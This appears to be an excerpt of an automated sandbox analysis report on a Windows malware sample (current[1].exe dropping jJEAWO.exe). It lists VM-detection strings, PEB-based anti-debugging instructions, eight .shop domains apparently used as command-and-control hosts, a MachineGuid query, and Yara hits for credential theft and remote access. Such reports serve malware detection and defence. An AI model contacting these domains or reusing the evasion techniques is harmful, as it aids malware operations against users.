Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\			Jump to behavior

Source: Amcache.hve.1.dr	Binary or memory string: VMware
Source: Amcache.hve.1.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.1.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.1.dr	Binary or memory string: VMware, Inc.
Source: current[1].exe, 00000000.00000003.2020575396.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, current[1].exe, 00000000.00000003.1707640338.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, current[1].exe, 00000000.00000002.2053204670.00000000008CD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWm
Source: Amcache.hve.1.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.1.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.1.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.1.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: current[1].exe, 00000000.00000003.2020575396.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, current[1].exe, 00000000.00000003.1707640338.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, current[1].exe, 00000000.00000002.2053177286.0000000000880000.00000004.00000020.00020000.00000000.sdmp, current[1].exe, 00000000.00000002.2053204670.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, jJEAWO.exe, 00000001.00000003.1683352875.00000000010EB000.00000004.00000020.00020000.00000000.sdmp, jJEAWO.exe, 00000001.00000003.1683352875.000000000109F000.00000004.00000020.00020000.00000000.sdmp, jJEAWO.exe, 00000001.00000002.1862651851.000000000109F000.00000004.00000020.00020000.00000000.sdmp, jJEAWO.exe, 00000001.00000002.1862651851.000000000105E000.00000004.00000020.00020000.00000000.sdmp, jJEAWO.exe, 00000001.00000002.1862651851.00000000010EB000.00000004.00000020.00020000.00000000.sdmp, jJEAWO.exe, 00000001.00000003.1683352875.000000000107B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.1.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.1.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.1.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.1.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.1.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.1.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.1.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.1.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.1.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.1.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.1.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.1.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.1.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.1.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.1.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.1.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.1.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.1.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.1.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.1.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.1.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe

API call chain: ExitProcess graph end node

Anti Debugging

Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00461070 mov eax, dword ptr fs:[00000030h]		0_2_00461070
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00461260 mov eax, dword ptr fs:[00000030h]		0_2_00461260
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0046148C mov eax, dword ptr fs:[00000030h]		0_2_0046148C
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_004614B0 mov eax, dword ptr fs:[00000030h]		0_2_004614B0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_004614B0 mov eax, dword ptr fs:[00000030h]		0_2_004614B0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0045DD68 mov ecx, dword ptr fs:[00000030h]		0_2_0045DD68
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00460E50 mov eax, dword ptr fs:[00000030h]		0_2_00460E50
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007A10B7 mov eax, dword ptr fs:[00000030h]		0_2_007A10B7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007A14C7 mov eax, dword ptr fs:[00000030h]		0_2_007A14C7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0074092B mov eax, dword ptr fs:[00000030h]		0_2_0074092B
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00740D90 mov eax, dword ptr fs:[00000030h]		0_2_00740D90
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0079DFCF mov ecx, dword ptr fs:[00000030h]		0_2_0079DFCF
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0082E933 push dword ptr fs:[00000030h]		0_2_0082E933

HIPS / PFW / Operating System Protection Evasion

Source: current[1].exe	String found in binary or memory: sofahuntingslidedine.shop
Source: current[1].exe	String found in binary or memory: culturesketchfinanciall.shop
Source: current[1].exe	String found in binary or memory: triangleseasonbenchwj.shop
Source: current[1].exe	String found in binary or memory: modestessayevenmilwek.shop
Source: current[1].exe	String found in binary or memory: liabilityarrangemenyit.shop
Source: current[1].exe	String found in binary or memory: claimconcessionrebe.shop
Source: current[1].exe	String found in binary or memory: secretionsuitcasenioise.shop
Source: current[1].exe	String found in binary or memory: gemcreedarticulateod.shop

Source: SciTE.exe.1.dr

Binary or memory string: Ctrl+RightLeftDownUpDecimalMinusMultiplyDivideTabSpaceDeleteEscapeEndInsertEnterHomeForwardBackwardPLAT_WIN1PageDownPageUpMenuWinSciTEACCELSSciTEWindowContentSciTEWindowPLAT_WINNT1toolbar.largecreate.hidden.consolegbkbig5euc-krshift_jisutf-8asciilatin2latin1translation.encodingwindows-1251ScaleFactoriso-8859-5cyrillic1250iso8859-11SciTE_HOMEAppsUseLightThemeSciTE_USERHOMESciTE_HOMEPropertiesScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Themes\PersonalizeEmbeddedRich Text FormatButtonShell_TrayWndUSERPROFILESciTE_HOMEHtmlHelpWHHCTRL.OCX

Language, Device and Operating System Detection

Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe

Code function: 1_2_00E91718 GetSystemTimeAsFileTime,SHSetValueA,SHGetValueA,__aulldiv,__aulldiv,

1_2_00E91718

Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe

Code function: 1_2_00E9139F GetVersionExA,LookupPrivilegeValueA,GetCurrentProcessId,

1_2_00E9139F

Source: C:\Users\user\Desktop\current[1].exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Source: Amcache.hve.1.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: jJEAWO.exe, 00000001.00000003.1683352875.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, jJEAWO.exe, 00000001.00000003.1683579567.00000000010B4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Program Files\Windows Defender\MsMpEng.exe
Source: Amcache.hve.1.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.1.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.1.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Source: Yara match

File source: Process Memory Space: jJEAWO.exe PID: 7452, type: MEMORYSTR

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: current[1].exe PID: 7436, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality

Source: Yara match

File source: Process Memory Space: jJEAWO.exe PID: 7452, type: MEMORYSTR

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: current[1].exe PID: 7436, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR